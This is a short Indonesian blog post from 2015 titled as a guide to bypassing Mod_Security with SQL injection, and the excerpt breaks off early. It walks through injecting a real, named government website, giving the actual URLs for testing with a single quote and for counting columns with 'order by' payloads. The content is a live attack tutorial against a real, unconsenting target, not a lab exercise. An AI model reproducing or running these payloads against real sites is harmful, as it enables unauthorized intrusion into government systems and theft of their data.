Minggu, 07 Juni 2015

Bypass Mod_Security SQLInjection

  Demo : multan.gov.pk/files.php?id=1 Pertama seperti biasa cek web pulen atau tidak                   multan.gov.pk/files.php?id=1' ==> Error Kedua cari jumlah column multan.gov.pk/files.php?id=1+order+by+1--+ ===> normal multan.gov.pk/files.php?id=1+order+by+2--+...